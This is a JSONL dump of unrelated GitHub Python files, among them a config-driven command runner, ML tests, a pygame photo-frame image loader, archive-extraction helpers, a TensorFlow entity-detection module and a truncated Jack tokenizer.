if config.get(cmd_key):\n # clean and make sure the command is safe?\n clean_cmd = self._clean_command(config.get(cmd_key))\n # Set the operation name\n # Pre-append fungrams_wakeup so user can know it was run from this module\n op_name = f\"fungrams_wakup : {cmd_key}\"\n # run the command\n retcode = self._run_command({'command': clean_cmd, 'op_name': op_name}, timeout)\n if retcode == 0:\n cprint(f\"{cmd_key} : completed!\", 'bold', 'green')\n else:\n cprint(f\"{cmd_key} : failed with code {retcode}\", 'bold', 'light_red')\n else:\n raise Exception(f\"Error: Could not found find {cmd_key}\")\n\n def process_single_command(self, cmd_key, timeout):\n cmds_object = self.get_config()\n self._process_command(cmd_key, timeout, cmds_object)\n\n def process_group_command(self, group_key, timeout):\n # Runs a command group which is just an ordered string of command keys separated with semicolons\n cmds_object = self.get_config()\n if cmds_object.get(group_key):\n # command group should be separated with semicolons\n cmds = cmds_object.get(group_key).split(';')\n for cmd in cmds:\n # prevent recursion, but this wouldn't work anyways bc it would be improperly parsed\n if cmd == group_key:\n continue\n self._process_command(cmd, timeout, cmds_object)\n else:\n raise Exception(f\"Error: Command {group_key} not found in config {list(cmds_object.keys())}\")\n\n def add_command(self, cmd_key, cmd_string, overwrite=False, immediate_update=True):\n if ';' in cmd_key:\n raise Exception(\"No Semicolons are allowed in the command name.\")\n clean_cmd = self._clean_command(cmd_string)\n clean_string = ' '.join([_ for _ in clean_cmd])\n # Returns: (is_error, response)\n return self.config.set_entry(self.section_name, cmd_key, clean_string, overwrite, immediate_update)\n\n def add_group_command(self, group_key, cmds_list, overwrite=False, 
immediate_update=True):\n if ';' in group_key:\n raise Exception(\"No Semicolons are allowed in the group command name.\")\n group_config = self.get_config()\n for cmd_key in cmds_list:\n if cmd_key not in group_config:\n raise Exception(f\"Error: Could not find command {cmd_key}\")\n if ';' in cmd_key:\n raise Exception(\"No Semicolons are allowed in the command name.\")\n cmds_string = ';'.join([_ for _ in cmds_list])\n return self.config.set_entry(self.section_name, group_key, cmds_string, overwrite, immediate_update)\n\n","repo_name":"deadmau6/fungrams","sub_path":"Services/WakeUp/wake_up.py","file_name":"wake_up.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"2888312867","text":"import numpy as np\n\n# single class CE\n\ndef cross_entropy(Y, P):\n Y = np.float_(Y)\n P = np.float_(P)\n return -np.sum(Y * np.log(P) + (1 - Y) * np.log(1 - P))\n\n# multi-class CE\n\n","repo_name":"chen2018k/DL","sub_path":"intro_NN/cross-entropy.py","file_name":"cross-entropy.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30740091360","text":"import pytest\nimport torch\nfrom torch import nn\n\nfrom easyfsl.datasets import SupportSetFolder\nfrom easyfsl.methods import MatchingNetworks\n\n\nclass TestMatchingNetworksInit:\n @staticmethod\n @pytest.mark.parametrize(\n \"backbone\",\n [\n nn.Conv2d(3, 4, 4),\n ],\n )\n def test_constructor_raises_error_when_arg_is_not_a_feature_extractor(backbone):\n with pytest.raises(ValueError):\n MatchingNetworks(backbone)\n\n\nclass TestMatchingNetworksPipeline:\n @staticmethod\n def test_matching_networks_returns_expected_output_for_example_images(\n example_few_shot_classification_task,\n ):\n (\n support_images,\n support_labels,\n query_images,\n ) = example_few_shot_classification_task\n\n torch.manual_seed(1)\n torch.set_num_threads(1)\n\n model = MatchingNetworks(nn.Flatten())\n\n model.process_support_set(support_images, support_labels)\n predictions = model(query_images)\n\n # pylint: disable=not-callable\n assert torch.all(\n torch.isclose(\n predictions,\n torch.tensor([[-1.3137, -0.3131], [-1.0779, -0.4160]]),\n atol=1e-01,\n )\n )\n # pylint: enable=not-callable\n\n\nclass TestMatchingNetsCanProcessSupportSetFolder:\n @staticmethod\n @pytest.mark.parametrize(\n \"support_set_path\",\n [\n \"easyfsl/tests/datasets/resources/balanced_support_set\",\n \"easyfsl/tests/datasets/resources/unbalanced_support_set\",\n ],\n )\n def test_matching_nets_can_process_support_set(support_set_path, dummy_network):\n support_set = SupportSetFolder(support_set_path)\n support_images = support_set.get_images()\n support_labels = support_set.get_labels()\n\n model = MatchingNetworks(backbone=dummy_network)\n model.process_support_set(support_images, support_labels)\n\n query_images = torch.randn((4, 3, 224, 224))\n model(query_images)\n","repo_name":"yylixianji/current-based-tool-wear-detection-with-FSL-and-TL","sub_path":"easy-few-shot-learning-master/easyfsl/tests/methods/matching_networks_test.py","file_name":"matching_networks_test.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
+{"seq_id":"15548550393","text":"import pygame\nimport exifread\nimport os\nimport urllib.request\nfrom settings import * \nfrom PIL import Image\n# import heicTojpg as h2jpg\n\nclass ImageLib():\n def __init__(self, api):\n \"\"\"\n Loads images from online path or from alternative offline path\n \"\"\"\n self._onlinePath = \"Img/\"\n self._offlinePath = \"ImgOffline/\"\n #self._path = path\n self._api = api\n self._images = []\n self._currentIndex = -1\n self._image = None\n \n \n def getNextImage(self):\n \"\"\"Updates image to the next one\"\"\"\n self._images = self._api.updateImageNames()\n \n # Get index from local txt file. \n # This ensures that the image queue does not reset if the Pola restarts.\n try: \n f = open(\"memoryIndex.txt\", 'r')\n self._currentIndex = int((f.read()))\n f.close()\n except: \n self._currentIndex = -1\n \n self._currentIndex = (self._currentIndex + 1) % len(self._images)\n \n f = open(\"memoryIndex.txt\", 'w')\n f.write(str(self._currentIndex))\n f.close()\n \n \n # If there is an internet connection, go online. If not, get the \"no wifi error\"- image queue\n try:\n urllib.request.urlopen('http://torabodin.com/')\n try: \n imageName = self._api.downloadImage(self._currentIndex)\n print(1, imageName)\n self._image= self.loadImage(imageName, True)\n print (self._image)\n \n except: \n self._image = self.getNextImage()\n \n except:\n self._image = self.loadImage(None, False)\n \n \n return self._image\n \n def loadImage(self, name, online):\n if online: \n image = self._onlinePath + name\n \n else:\n image = self._offlinePath + str(self._currentIndex % 3) + \".jpeg\"\n \n \"\"\"\n Converting HEIF and HEIC images does not work at the moment. \n If they are present, they will be downloaded and then just ignored, as python cannot open them. \n \"\"\"\n #image = h2jpg.convert(image, None, 100) \n \n pygameImage = Img(image)\n pygameImage.offline = not online\n return pygameImage\n \n \nclass Img():\n \"\"\"Image class. Loads pygame image from image filename\"\"\"\n\n def __init__(self, filename):\n print(2, filename)\n self._name = filename\n self.x = 0\n self.y = 0\n self._image = pygame.image.load(self._name)\n self.offline = True\n \n \n self.rotate()\n self.scaleZoomed(720, 720)\n self.positionZoomed()\n \n def delete(self):\n \"\"\"Used to delete image after it has been displayed, \n so that we do not accidentally fill up our PI memory with old photos. \n Do note that images that are not showed (ex. heic images) will not be deleted either at the moment. \"\"\"\n os.system(\"rm \"+self._name) \n\n def rotate(self):\n \"\"\"Rotate image based on exif tags (if any) \"\"\"\n val = None\n try:\n \"\"\"Get rotation tags\"\"\"\n f = open(self._name, 'rb')\n tags = exifread.process_file(f)\n f.close()\n orientation = tags[\"Image Orientation\"]\n val = orientation.values\n\n except:\n return True\n\n if 3 in val:\n rotation = 180\n\n elif 6 in val:\n rotation = 270\n\n elif 8 in val:\n rotation = 90\n\n else:\n rotation = 0\n\n self._image = pygame.transform.rotate(self._image, rotation)\n\n def scaleZoomed(self, bx, by):\n \"\"\"Scales the image so that it will fill the entire screen. 
\n Image will be cropped if neccessary\"\"\"\n ix, iy = self._image.get_size()\n if ix > iy:\n # fit to width\n scale = bx/float(iy)\n sy = scale * ix\n if sy > by:\n scale = by/float(iy)\n sx = scale * ix\n sy = by\n else:\n sx = bx\n else:\n # fit to height\n scale = by/float(ix)\n sx = scale * iy\n if sx > bx:\n scale = bx/float(ix)\n sx = bx\n sy = scale * iy\n else:\n sy = by\n\n self._image = pygame.transform.scale(self._image, (int(sx), int(sy)))\n \n def positionZoomed(self):\n \"\"\"Positions image so that the middle-part of the image will be shown.\n Image will be cropped if neccessary\"\"\"\n rect_size = self._image.get_rect()\n\n if rect_size.width > 720:\n self.x = (int((720 - rect_size.width ) / 2))\n\n if rect_size.height > 720:\n self.y = (int((720 - rect_size.height) / 2))\n\n \n def getImage(self):\n \"\"\"returns image object\"\"\"\n return self._image\n \n \"\"\"\n The functions that are commented out can be used to display the entire image without cropping it. \n This version will provide black borders if the image is not square. \n \"\"\"\n \n #def scaleFull(self, bx, by):\n #\"\"\" Scales image to fit into the frame.\n #This method will retain the original image's aspect ratio \n #Black borders will be shown on sides/top/bottom when neccessary\"\"\"\n #ix, iy = self._image.get_size()\n #if ix > iy:\n ## fit to width\n #scale_factor = bx/float(ix)\n #sy = scale_factor * iy\n #if sy > by:\n #scale_factor = by/float(iy)\n #sx = scale_factor * ix\n #sy = by\n #else:\n #sx = bx\n #else:\n ## fit to height\n #scale_factor = by/float(iy)\n #sx = scale_factor * ix\n #if sx > bx:\n #scale_factor = bx/float(ix)\n #sx = bx\n #sy = scale_factor * iy\n #else:\n #sy = by\n\n #self._image = pygame.transform.scale(self._image, (int(sx), int(sy)))\n\n \n #def positionFull(self):\n #\"\"\"Positions scaled image in center of screen. \n #Black borders will be shown on sides/top/bottom when neccessary\"\"\"\n #rect_size = self._image.get_rect()\n\n #if rect_size.width < 720:\n #self.x = abs(int((rect_size.width - 720) / 2))\n\n #if rect_size.height < 720:\n #self.y = abs(int((rect_size.height - 720) / 2))\n\n #print(\"X and Y position: \", self.x, self.y)\n\n\nclass Fader():\n \"\"\"The\"fader film\" that goes on top of the image to change opacity\"\"\"\n\n def __init__(self, x, y):\n self._film = pygame.Surface((x, y))\n self._alpha = None\n self.setAlpha(0)\n\n def getFader(self):\n \"\"\"returns fader object\"\"\"\n return self._film\n\n def setAlpha(self, alpha):\n \"\"\"set fade opacity\"\"\"\n self._alpha = alpha\n self._film.set_alpha(self._alpha)\n","repo_name":"ToraBodin/Pola2.0","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":7046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3308668320","text":"from llama_index import VectorStoreIndex, SimpleDirectoryReader\nfrom llama_index import StorageContext, load_index_from_storage\n\nimport logging\nimport sys\nimport openai \nimport os\n\nfrom typing import List\nfrom pydantic import BaseModel\n\nclass Biography(BaseModel):\n \"\"\"Data model for a biography.\"\"\"\n\n name: str\n best_known_for: List[str]\n extra_info: str\n\ndef enable_debug():\n openai.log = \"debug\"\n\n logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n logging.getLogger().addHandler(logging.StreamHandler(stream=sys.stdout))\n\ndef get_index():\n #documents = SimpleDirectoryReader('data').load_data()\n pss_data = \"/root/llm_exam/llama_index/examples/paul_graham_essay/pss\"\n if not os.path.isdir(pss_data):\n raw_data = \"/root/llm_exam/llama_index/examples/paul_graham_essay/data\"\n documents = SimpleDirectoryReader(raw_data).load_data()\n index = VectorStoreIndex.from_documents(documents)\n index.storage_context.persist(persist_dir=pss_data)\n\n # rebuild storage context\n storage_context = StorageContext.from_defaults(persist_dir=pss_data)\n # load index\n index = load_index_from_storage(storage_context)\n return index \n\n\nif __name__ == \"__main__\":\n enable_debug()\n index = get_index()\n\n # query_engine = index.as_query_engine()\n # response = query_engine.query(\"What did the author do growing up?\")\n # print()\n # print(response)\n # print()\n\n #query_engine = index.as_query_engine(response_mode=\"tree_summarize\", output_cls=Biography)\n #query_engine = index.as_query_engine(output_cls=Biography)\n query_engine = index.as_query_engine(output_cls=Biography, response_mode=\"compact\")\n\n response = query_engine.query(\"Who is Paul Graham?\")\n\n print(response)\n #print(response.name)\n #print(response.best_known_for)\n #print(response.extra_info)\n","repo_name":"ethan-jiang-1/llm_exam","sub_path":"exam_li_intro/ex1_chat_engine_structure.py","file_name":"ex1_chat_engine_structure.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"15287025985","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Function comb\n# \n# ## Synopse\n# \n# Create a grid of impulses image.\n# \n# - **g = comb(shape, delta, offset)**\n# \n# - **g**: Image. \n# \n# \n# - **shape**: Image. output image dimensions (1-D, 2-D or 3-D).\n# - **delta**: Image. interval between the impulses in each dimension (1-D, 2-D or 3-D).\n# - **offset**: Image. offset in each dimension (1-D, 2-D or 3-D).\n\n# In[1]:\n\n\nimport numpy as np\ndef comb(shape, delta, offset):\n\n shape = np.array(shape)\n assert shape.size <= 3\n g = np.zeros(shape) \n if shape.size == 1:\n g[offset::delta] = 1\n elif shape.size == 2:\n g[offset[0]::delta[0], offset[1]::delta[1]] = 1\n elif shape.size == 3:\n g[offset[0]::delta[0], offset[1]::delta[1], offset[2]::delta[2]] = 1\n return g\n\n\n# ## Examples\n\n# In[1]:\n\n\ntesting = (__name__ == \"__main__\")\nif testing:\n get_ipython().system(' jupyter nbconvert --to python comb.ipynb')\n import numpy as np\n import sys,os\n import matplotlib.image as mpimg\n ia898path = os.path.abspath('../../')\n if ia898path not in sys.path:\n sys.path.append(ia898path)\n import ia898.src as ia\n\n\n# ### Example 1\n\n# In[2]:\n\n\nif testing:\n u1 = ia.comb(10, 3, 2)\n print('u1=',u1)\n u2 = ia.comb((10,), 3, 2)\n print('u2=',u2)\n\n\n# ### Example 2\n\n# In[3]:\n\n\nif testing:\n u3 = ia.comb((7,9), (1,2), (0,1))\n print('u3=\\n',u3)\n\n\n# ### Example 3\n\n# In[4]:\n\n\nif testing:\n u4 = ia.comb((4,5,9), (2,1,2), (1,0,1))\n print(u4)\n\n\n# ## Equation\n# \n# One dimension:\n# \n# $$ \\begin{matrix} u(x)=\\sum _{i=0}^{\\infty}\\delta \\left( x-\\left( ki+o\\right) \\right)\\\\\n# x\\in [0,S_0-1]\n# \\end{matrix}\n# $$\n\n# $$\\begin{matrix}\n# where\\quad \\delta (i)=\\left\\{ \\begin{array}{ll}\n# 1, & i=0\\\\\n# 0, & otherwise\n# \\end{array}\\right.\n# \\end{matrix}\n# $$\n\n# N-dimension:\n# \n# $$\n# \\begin{matrix}\n# u\\left( x_{0},x_{1},\\cdots ,x_{N-1}\\right) =\\sum _{i_{0}=0}^{\\infty}\\sum _{i_{1}=0}^{\\infty}\\cdots \\sum _{i_{N-1}=0}^{\\infty}\\delta \\left( x_{0}-\\left( k_{0}i_{0}+o_{0}\\right) ,x_{1}-\\left( k_{1}i_{1}+o_{1}\\right) ,\\cdots ,x_{N-1}-\\left(k_{N-1}i_{N-1}+o_{N-1}\\right) \\right)\\\\\n# \\left( x_{0},x_{1},\\cdots ,x_{N-1}\\right) \\in \\left[ \\left( 0,0,\\cdots ,0\\right) ,\\left( S_{0}-1,S_{1}-1,\\cdots ,S_{N-1}-1\\right) \\right]\n# \\end{matrix} $$\n\n# $$\\begin{matrix}\n# where\\quad \\delta (i_0,i_1,\\ldots,i_{N-1})=\\left\\{ \\begin{array}{ll}\n# 1, & i_0=i_1=i_2=\\ldots=i_{N-1}=0\\\\\n# 0, & otherwise\n# \\end{array}\\right.\n# \\end{matrix}\n# $$\n\n# In[5]:\n\n\nif testing:\n print('testing comb')\n print(repr(ia.comb(10, 3, 2)) == repr(np.array(\n [0., 0., 1., 0., 0., 1., 0., 0., 1., 0.])))\n print(repr(ia.comb((7,9), (3,4), (3,2))) == repr(np.array(\n [[0., 0., 0., 0., 0., 0., 0., 0., 0.],\n [0., 0., 0., 0., 0., 0., 0., 0., 0.],\n [0., 0., 0., 0., 0., 0., 0., 0., 0.],\n [0., 0., 1., 0., 0., 0., 1., 0., 0.],\n [0., 0., 0., 0., 0., 0., 0., 0., 0.],\n [0., 0., 0., 0., 0., 0., 0., 0., 0.],\n [0., 0., 1., 0., 0., 0., 1., 0., 0.]])))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"gui88Abreu/IA898-DigitalImageProcessing","sub_path":"src/comb.py","file_name":"comb.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"19140891970","text":"import rarfile\nimport yaml\nimport gzip\nimport tarfile\nimport os\nimport zipfile\n\n'''\nglobal param\n'''\nconfig_yaml = './config/config.yaml'\n\n\n'''\ndecompressing files\n'''\ndef ungz(filename):\n filename = filename[:-3] # gz文件的单文件解压就是去掉 filename 后面的 .gz\n gz_file = gzip.GzipFile(filename)\n with open(filename, \"w+\") as file:\n file.write(gz_file.read())\n return filename # 这个gzip的函数需要返回值以进一步配合untar函数\n\ndef untar(filename):\n tar = tarfile.open(filename)\n names = tar.getnames()\n # tar本身是将文件打包,解除打包会产生很多文件,因此需要建立文件夹存放\n if not os.path.isdir(filename + \"_dir\"):\n os.mkdir(filename + \"_dir\")\n for name in names:\n tar.extract(name, filename + \"_dir/\")\n tar.close()\n\ndef unzip(filename):\n zip_file = zipfile.ZipFile(filename)\n # 类似tar解除打包,建立文件夹存放解压的多个文件\n if not os.path.isdir(filename + \"_dir\"):\n os.mkdir(filename + \"_dir\") \n for names in zip_file.namelist():\n if not str(names).startswith('__MACOSX/'):\n zip_file.extract(names, filename + \"_dir/\")\n zip_file.close()\n \n\n\ndef unrar(filename):\n rar = rarfile.RarFile(filename)\n if not os.path.isdir(filename + \"_dir\"):\n os.mkdir(filename + \"_dir\")\n os.chdir(filename + \"_dir\")\n rar.extractall()\n rar.close()\n\ndef decompress(filename_list):\n foldername_list = []\n for filename in filename_list:\n if '.' in filename:\n suffix = filename.split('.')[-1]\n if suffix == 'gz':\n new_filename = ungz(filename)\n os.remove(filename)\n if new_filename.split('.')[-1] == 'tar':\n untar(new_filename)\n os.remove(new_filename) \n if suffix == 'tar':\n untar(filename)\n os.remove(filename)\n if suffix == 'zip':\n unzip(filename)\n os.remove(filename)\n if suffix == 'rar':\n unrar(filename)\n os.remove(filename)\n foldername_list.append(filename+'_dir')\n return foldername_list\n\n# \ndef get_files_from_folder_with_suffix(folder_list, accept_suffix):\n \n data_files = []\n for folder in folder_list:\n for path, dir_list, file_list in os.walk(folder):\n for file in file_list:\n if os.path.splitext(file)[-1] in accept_suffix:\n data_files.append(os.path.join(path, file))\n \n return data_files\n\ndef get_config():\n f = open(config_yaml, 'r', encoding='utf-8')\n cfg = f.read()\n print(cfg)\n\n config = yaml.load(cfg,Loader=yaml.FullLoader) # 用load方法转字典\n print(config)\n return config\n\n","repo_name":"CharlieSong1999/Demo","sub_path":"Back-End/utilies.py","file_name":"utilies.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"37460437567","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import logging\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom protos import model_pb2\nfrom modeling.utils import masked_ops\nfrom modeling.utils import box_ops\nfrom models.cap2sg_data import DataTuple\n\n\ndef detect_entities(options, dt):\n \"\"\"Grounds entities.\n\n Args:\n options: A Cap2SGDetection proto.\n dt: A DataTuple object, served as a collection of global variables.\n\n Returns:\n dt.detection.valid_detections: Number of detections, [batch].\n dt.detection.nmsed_boxes: Detection boxes, [batch, max_n_detection, 4].\n dt.detection.nmsed_scores: Detection scores, [batch, max_n_detection],\n dt.detection.nmsed_classes: Detection classes, [batch, max_n_detection],\n dt.detection.nmsed_attribute_scores: Object attribute scores, [batch, max_n_detection].\n dt.detection.nmsed_attribute_classes: Object attribute class, [batch_max_n_detection].\n dt.refined_grounding.entity_proposal_id: Grounding vector, the ``g'' vector in our paper, [batch, max_n_entity].\n dt.refined_grounding.entity_proposal_box: Grounded boxes, [batch, max_n_entity, 4],\n dt.refined_grounding.entity_proposal_score: Grounding scores, [batch, max_n_entity]\n dt.refined_grounding.entity_proposal_feature: Grounded features, [batch, max_n_entity, vdims]\n \"\"\"\n if not isinstance(options, model_pb2.Cap2SGDetection):\n raise ValueError('Options has to be a Cap2SGDetection proto.')\n\n if not isinstance(dt, DataTuple):\n raise ValueError('Invalid DataTuple object.')\n\n # Compute proposal iou.\n propogation_matrix = tf.cast(\n dt.proposal_iou > options.grounding_iou_threshold, tf.float32)\n\n # Compute detection labels.\n dt.detection_instance_labels_list = []\n dt.detection_instance_logits_list = []\n dt.detection_instance_scores_list = []\n\n entity_proposal_id = dt.grounding.entity_proposal_id\n for itno in range(options.num_iterations):\n detection_instance_labels = _scatter_entity_labels(\n proposal_id=entity_proposal_id,\n entity_id=dt.entity_ids,\n max_n_proposal=dt.max_n_proposal,\n vocab_size=dt.vocab_size)\n detection_instance_labels = tf.matmul(propogation_matrix,\n detection_instance_labels)\n dt.detection_instance_labels_list.append(detection_instance_labels)\n\n # Predict detection scores.\n detection_head = tf.layers.Dense(dt.dims,\n kernel_initializer=tf.keras.initializers.RandomNormal(\n mean=0.0, stddev=0.01),\n name='entity_detection_head_%i' % itno)(\n dt.proposal_features)\n (detection_instance_logits,\n detection_instance_scores) = _box_classify(detection_head, dt.embeddings,\n dt.bias_entity)\n dt.detection_instance_logits_list.append(detection_instance_logits)\n dt.detection_instance_scores_list.append(detection_instance_scores)\n\n # Update the proposal id associated to the image-level entity label.\n # I.e., update the ``g'' vector in the paper.\n dummy_attention = tf.gather_nd(tf.transpose(detection_instance_scores,\n [0, 2, 1]),\n indices=_get_full_indices(dt.entity_ids))\n entity_proposal_id = tf.math.argmax(dummy_attention,\n axis=2,\n output_type=tf.int32)\n # Compute attribute labels.\n if options.predict_attributes:\n dt.attribute_instance_labels = _scatter_attribute_labels(\n dt.grounding.entity_proposal_id, dt.per_ent_att_ids, dt.max_n_proposal,\n dt.vocab_size)\n attribute_head = tf.layers.Dense(dt.dims,\n kernel_initializer=tf.keras.initializers.RandomNormal(\n mean=0.0, stddev=0.01),\n 
name='attribute_detection_head')(\n dt.proposal_features)\n (dt.attribute_instance_logits,\n dt.attribute_instance_scores) = _box_classify(attribute_head,\n dt.embeddings,\n dt.bias_attribute)\n\n # Save the grounding results.\n dt.refined_grounding.entity_proposal_id = entity_proposal_id\n dt.refined_grounding.entity_proposal_score = tf.reduce_max(\n dummy_attention, 2)\n\n indices = _get_full_indices(entity_proposal_id)\n dt.refined_grounding.entity_proposal_box = tf.gather_nd(\n dt.proposals, indices)\n dt.refined_grounding.entity_proposal_feature = tf.gather_nd(\n dt.proposal_features, indices)\n\n # Postprocess: non-maximum-suppression.\n post_process = options.post_process\n (dt.detection.nmsed_boxes, dt.detection.nmsed_scores,\n dt.detection.nmsed_classes,\n dt.detection.valid_detections) = tf.image.combined_non_max_suppression(\n tf.expand_dims(dt.proposals, 2),\n detection_instance_scores[:, :, 1:],\n max_output_size_per_class=post_process.max_size_per_class,\n max_total_size=post_process.max_total_size,\n iou_threshold=post_process.iou_thresh,\n score_threshold=post_process.score_thresh)\n dt.detection.nmsed_classes = tf.cast(\n 1 + dt.detection.nmsed_classes, tf.int32)\n\n # Get the proposal id of the detection box, then fetch the other information.\n iou = _compute_iou(dt.detection.valid_detections, dt.detection.nmsed_boxes,\n dt.n_proposal, dt.proposals)\n dt.detection.nmsed_proposal_id = tf.math.argmax(iou,\n axis=2,\n output_type=tf.int32)\n indices = _get_full_indices(dt.detection.nmsed_proposal_id)\n dt.detection.nmsed_features = tf.gather_nd(dt.proposal_features, indices)\n # nmsed_attribute = tf.gather_nd(dt.attribute_instance_scores, indices)\n # dt.detection.nmsed_attribute_scores = tf.reduce_max(nmsed_attribute, -1)\n # dt.detection.nmsed_attribute_classes = tf.argmax(nmsed_attribute,\n # axis=2,\n # output_type=tf.int32)\n\n return dt\n\n\ndef _get_full_indices(index):\n \"\"\"Gets full indices from a single index.\n\n Args:\n index: A single index, a [batch, max_n_elem] int tensor.\n\n Returns:\n indices: Full indices with batch dimension added.\n \"\"\"\n batch, max_n_elem = index.shape[0].value, index.shape[1].value\n if max_n_elem is None:\n max_n_elem = tf.shape(index)[1]\n\n batch_index = tf.broadcast_to(tf.expand_dims(tf.range(batch), 1),\n [batch, max_n_elem])\n return tf.stack([batch_index, index], -1)\n\n\ndef _box_classify(detection_head, embeddings, bias, normalize_fn=tf.nn.softmax):\n \"\"\"Predicts classes based on the detection head.\n\n Args:\n detection_head: A [batch, max_n_proposal, dims] float tensor.\n embeddings: Embedding matrix, a [vocab_size, dims] float tensor.\n bias: A [vocab_size] float tensor.\n normalize_fn: Function to normalize scores.\n\n Returns:\n detection_logits: Logits tensor, a [batch, max_n_proposal, vocab_size] \n float tensor.\n detection_scores: Normalized scores, a [batch, max_n_proposal, vocab_size] \n float tensor.\n \"\"\"\n detection_logits = tf.matmul(detection_head, embeddings, transpose_b=True)\n detection_logits = tf.nn.bias_add(detection_logits, bias)\n detection_scores = normalize_fn(detection_logits)\n\n # Set background scores to zeros; note the logits still contain background.\n batch = detection_head.shape[0].value\n max_n_proposal = tf.shape(detection_head)[1]\n detection_scores = tf.concat(\n [tf.zeros([batch, max_n_proposal, 1]), detection_scores[:, :, 1:]], -1)\n return detection_logits, detection_scores\n\n\ndef _compute_iou(n_box1, box1, n_box2, box2):\n \"\"\"Computes the IoU between two sets of 
boxes.\n\n Args:\n n_box1: A [batch] int tensor.\n box1: A [batch, max_n_box1, 4] float tensor.\n n_box2: A [batch] int tensor.\n box2: A [batch, max_n_box2, 4] float tensor.\n\n Returns:\n iou: A [batch, max_n_box1, max_n_box2] float tensor.\n \"\"\"\n mask1 = tf.sequence_mask(n_box1, maxlen=tf.shape(box1)[1], dtype=tf.float32)\n mask2 = tf.sequence_mask(n_box2, maxlen=tf.shape(box2)[1], dtype=tf.float32)\n mask = tf.multiply(tf.expand_dims(mask1, 2), tf.expand_dims(mask2, 1))\n\n iou = box_ops.iou(tf.expand_dims(box1, 2), tf.expand_dims(box2, 1))\n return tf.multiply(iou, mask)\n\n\ndef _scatter_entity_labels(proposal_id, entity_id, max_n_proposal, vocab_size):\n \"\"\"Creates entity labels from pseudo instances.\n\n Args:\n proposal_id: A [batch, max_n_node] int tensor, denoting the proposal index.\n entity_id: A [batch, max_n_node] int tensor, values are in [0, vocab_size).\n max_n_proposal: Maximum number of proposals.\n vocab_size: Size of the vocabulary.\n\n Returns:\n A [batch, max_n_proposal, vocab_size] tensor.\n \"\"\"\n batch = proposal_id.shape[0].value\n max_n_node = tf.shape(entity_id)[1]\n\n index_batch = tf.broadcast_to(tf.expand_dims(tf.range(batch), 1),\n [batch, max_n_node])\n index_full = tf.stack([index_batch, proposal_id, entity_id], -1)\n return tf.scatter_nd(index_full,\n updates=tf.fill([batch, max_n_node], 1.0),\n shape=[batch, max_n_proposal, vocab_size])\n\n\ndef _scatter_attribute_labels(proposal_id, attribute_id, max_n_proposal,\n vocab_size):\n \"\"\"Create attribute labels from pseudo instances.\n\n Args:\n proposal_id: A [batch, max_n_node] int tensor, denoting the proposal index.\n attribute_id: A [batch, max_n_node, max_n_attribute] int tensor, values are in [0, vocab_size).\n max_n_proposal: Maximum number of proposals.\n vocab_size: Size of the vocabulary.\n\n Returns:\n A [batch, max_n_proposal, vocab_size] tensor.\n \"\"\"\n batch = proposal_id.shape[0].value\n max_n_node = tf.shape(proposal_id)[1]\n\n attribute_labels = tf.reduce_max(tf.one_hot(attribute_id, depth=vocab_size),\n 2)\n attribute_labels = tf.concat(\n [tf.zeros([batch, max_n_node, 1]), attribute_labels[:, :, 1:]], -1)\n index_batch = tf.broadcast_to(tf.expand_dims(tf.range(batch), 1),\n [batch, max_n_node])\n return tf.scatter_nd(tf.stack([index_batch, proposal_id], -1),\n updates=attribute_labels,\n shape=[batch, max_n_proposal, vocab_size])\n","repo_name":"yekeren/WSSGG","sub_path":"models/cap2sg_detection.py","file_name":"cap2sg_detection.py","file_ext":"py","file_size_in_byte":10630,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"}
+{"seq_id":"4334283","text":"import sys\nimport re\nimport parser\n\nkeyword = ['class', 'constructor', 'function', 'method', \n 'field', 'static', 'var', 'int', 'char', 'boolean',\n 'void', 'true', 'false', 'null', 'this', 'let', 'do',\n 'if', 'else', 'while', 'return']\nsymbol = ['{', '}', '(', ')', '[', ']', '.', ',', ';', '+', '-', '*', '/', '&', '|', '<', '>', '=', '~' ]\ntoken_list_count = 0\nfinal_list = []\npgm_list = []\n\ndef next_token_temp():\n global token_list_count\n tkn = pgm_list[token_list_count]\n token = (tkn, token_type(tkn))\n return token\n\ndef next_token():\n global token_list_count\n token = pgm_list[token_list_count]\n token_list_count += 1\n token = (token, token_type(token))\n return token\n \ndef token_type(token):\n for ch in keyword:\n if ch == token:\n return 'keyword'\n for ch in symbol:\n if ch == token:\n #if token == '<':\n #print_token('<', 'symbol')\n return 'symbol'\n #else:\n #print_token(token, 'symbol')\n #return\n if token.isdigit():\n return 'integerConstant'\n if token.isalpha() or token[0] == '_' or token.isalnum():\n return 'identifier'\n else:\n return 'stringConstant'\n\ndef final_list_preparation(val):\n list2 = []\n string_l = []\n string_constant = \"\"\n i = -1\n for value in val:\n if value == '\\r':\n continue\n else:\n if value == \"\\\"\" and i!=0:\n i=0\n continue\n if i == 0 and value == \"\\\"\":\n i = 2\n pgm_list.append(string_constant)\n string_constant = ''\n continue\n if i == 0:\n string_constant = string_constant + ' ' + value\n continue\n else:\n pgm_list.append(value)\n\ndef tokanizer(file_path):\n f = open(file_path, 'r')\n lines = f.readlines()\n for ch in lines:\n final_list.append(re.findall(\"\\s*(\\d+|\\w+|.)\", ch))\n for ch in final_list:\n 